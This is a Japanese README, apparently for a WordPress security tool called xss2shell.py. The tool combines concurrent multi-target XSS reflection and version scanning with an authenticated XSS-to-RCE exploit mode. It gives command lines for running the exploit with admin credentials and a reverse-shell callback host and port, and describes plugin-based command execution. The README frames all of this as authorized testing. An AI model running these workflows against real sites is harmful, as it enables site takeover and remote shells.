
WordPressセキュリティスキャナ。バージョンのフィンガープリンティング、複数ターゲットに対するリフレクテッドXSSの並行検出、および許可されたテストのための認証済みXSS-to-RCEエクスプロイトワークフローをサポートします。
開発者: クレジット: YogaGymn
WordPress の許可されたセキュリティテストのための PoC/スキャニングユーティリティ。このプロジェクトには、単一ターゲット用のエクスプロイトフローと、スキャンのみの並行マルチターゲットモードが含まれています。
重要: このプロジェクトは、所有している WordPress インストール、または明示的なテスト許可を得ている WordPress インストールに対してのみ使用してください。マルチターゲットスキャナは、バージョン識別と XSS リフレクション検出のみに意図的に制限されています。ターゲットリストに対する資格情報の取得、プラグインのアップロード、RCE は実行しません。
元のスクリプトは以下をサポートしています:
auto、xss、direct モード。追加されたスキャナは以下をサポートしています:
ThreadPoolExecutor による並行スキャン。マルチターゲットモードは、元の RCE 関数を呼び出しません。
requests依存関係をインストール:
python3 -m pip install requests
Linux ディストリビューションが外部管理の Python 環境を使用している場合は、仮想環境を使用してください:
python3 -m venv .venv
source .venv/bin/activate
pip install requests
プロジェクトをクローンまたはコピーします: yogaGymn による元のエクスプロイト
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638
または、単に次のファイルを配置します:
xss2shell.py
作業ディレクトリ内に配置します。
targets.txt OU alvos.txt というファイルを作成します:
https://example1.test
https://example2.test
https://example3.test
コメント行と空行は無視されます:
# Alvos de laboratório autorizado
https://example1.test
https://example2.test
スキャナを実行:
python3 xss2shell.py -i targets.txt
デフォルトの並行度は 10 ワーカーです。
たとえば、20 ワーカーを使用する場合:
python3 xss2shell.py -i targets.txt --workers 20
小規模なラボの場合:
python3 xss2shell.py -i targets.txt --workers 5
必要以上に多い ワーカー 数を選択しないでください。接続負荷が増加し、レート制限や防御コントロールが作動する可能性があります。
python3 xss2shell.py \
-i targets.txt \
--workers 10 \
--output results.txt
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE
[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)
=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected : 1
Not detected : 2
Errors : 0
Results saved : scan_results.txt
デフォルトの scan_results.txt はタブ区切りのフィールドを使用します:
TARGET WORDPRESS_VERSION XSS_STATUS XSS_DETAIL
例:
https://example1.test 6.8.2 XSS_NOT_DETECTED ESCAPED
https://example2.test 6.7.1 XSS_REFLECTION_DETECTED AREA_BYPASS
ステータス 意味
XSS_REFLECTION_DETECTED スキャナは、テストした HTML リフレク
ション動作を検出しました。これは、それ
自体が RCE の証明になるわけではありま
せん。
XSS_NOT_DETECTED テストしたリフレクションは検出されま
せんでした。
ERROR チェック中に例外が発生しました。スキャナは次のような詳細を報告できます:
RAW_HTMLAREA_BYPASSESCAPEDSTRIPPEDNOT_REFLECTEDこれらの値は、検出ルーチンによって観測された応答を表します。結果を確認済みの脆弱性と見なす前に、手動で検証する必要があります。
元のスクリプトは単一ターゲット引数もサポートしています。
python3 xss2shell.py \
-u admin \
-p 'PASSWORD' \
http://authorized-target.test
python3 xss2shell.py \
--mode direct \
-u admin \
-p 'PASSWORD' \
http://authorized-target.test
python3 xss2shell.py \
--mode xss \
--lhost 192.0.2.10 \
http://authorized-lab.test
XSS/直接ワークフローは、コマンド実行機能を含むプラグインを作成または有効化する可能性があります。許可されたテスト環境でのみ使用してください。
usage: xss2shell.py [-h]
[-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
[--mode {auto,xss,direct}]
[-u USERNAME] [-p PASSWORD]
[--lhost LHOST] [--lport LPORT]
[--slug SLUG] [--callback-port CALLBACK_PORT]
[--no-rev]
[target]
引数 説明
target 単一ターゲットの URL。
-i, --input 複数のターゲットを含むファイル。
--output マルチターゲット結果の出力ファイ
ル。デフォルト: scan_results.txt。
--workers 並行ワーカー数。デフォルト: 10。
--mode 元の単一ターゲットモード: auto、
xss、または direct。
-u, --username 元の直接/フォールバックワークフ
ロー用の WordPress ユーザー名。
-p, --password 元の直接/フォールバックワークフ
ロー用の WordPress パスワード。
--lhost 元の PoC 用のコールバック/リバー
スシェルホスト。
--lport リバースシェルポート。デフォルト:
4444。
--slug プラグインスラッグ。デフォルト:
xss2shell。
--callback-port コールバックサーバーポート。デフォ
ルト: 9090。
--no-rev 元のワークフローでリバースシェルの
トリガーをスキップします。マルチターゲットモードは、Python の次の機能を使用します:
ThreadPoolExecutor
各ターゲットは独立したスキャンタスクとして送信されます:
targets.txt
|
v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ...
+----+----+----+----+
| | | |
v v v v
WP WP WP WP
XSS XSS XSS XSS
| | | |
+----+----+----+
|
v
scan_results.txt
結果はタスクの完了とともに収集され、最終出力はターゲットの元の順序に従って生成されます。
マルチターゲットモードは、許可されたセキュリティ評価とラボ環境向けに設計されています。
推奨ワークフロー:
targets.txt ファイルには許可されたドメイン/IP のみを含めます。許可なく第三者システムに対してスキャナを使用しないでください。
スキャナは完全な脆弱性評価ツールではありません。
特に:
unknown(不明)ステータスは、ターゲットが脆弱であることを意味しません。.
├── xss2shell.py
├── targets.txt
└── scan_results.txt
提供されたソースコードにはライセンス情報がありませんでした。
このプロジェクトを公開する場合は、LICENSE などの明示的なライセンスファイルを追加してください。このコードは、ZSecurity の元のコードをさらに発展させたものです。